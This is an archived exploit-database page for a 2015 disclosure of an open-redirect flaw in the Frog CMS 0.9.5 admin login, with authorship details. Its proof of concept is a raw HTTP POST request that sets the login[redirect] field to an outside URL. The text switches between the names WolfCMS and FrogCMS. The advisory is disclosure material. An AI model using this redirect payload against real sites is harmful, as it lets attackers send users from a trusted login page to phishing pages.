exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Frog CMS 0.9.5 Open Redirect

Frog CMS 0.9.5 Open Redirect
Posted Aug 10, 2015
Authored by Arash Khazaei

Frog CMS version 0.9.5 suffers from an open redirection vulnerability.

tags | exploit
SHA-256 | 25146709ae210870dc86ac03f1bf8b4109480705ca00c7eda11f7e4537afb3ba

Frog CMS 0.9.5 Open Redirect

Change Mirror Download
[+] Exploit Title: FrogCMS Open Redirect Vulnerability
[+] Google Dork: N/A
[+] Date: 10/8/2015
[+] Exploit Author: Arash Khazaei
[+] Vendor Homepage: http://www.madebyfrog.com/
[+] Software Link: http://www.madebyfrog.com/download.html
[+] Version: 0.9.5(Last Version)
[+] Tested on: Kali / Mozilla FireFox, Windows / Google Chrome
[+] CVE : N/A
[+] Contacts : 0xclay@gmail.com
[+] https://twitter.com/0xClay

===============================

Introduction :
WolfCMS Is A Content Management System And Coded In PHP.
A Vulnerability In FrogCMS 0.9.5(Last Version) Allow Open Redirect In CMS
Admin Page
===============================
POC:

POST /frog/?/admin/login/login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101
Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wolfcms/?/admin/login
Cookie: PHPSESSID=cromsl98l41rudqe4ubront5v3
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

login[username]=admin&login[password]=admin&login[redirect]=
http://google.com/


# Vulnerable Input => login[redirect]=[Open Redirect]




Discovered By : Arash Khazaei .
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close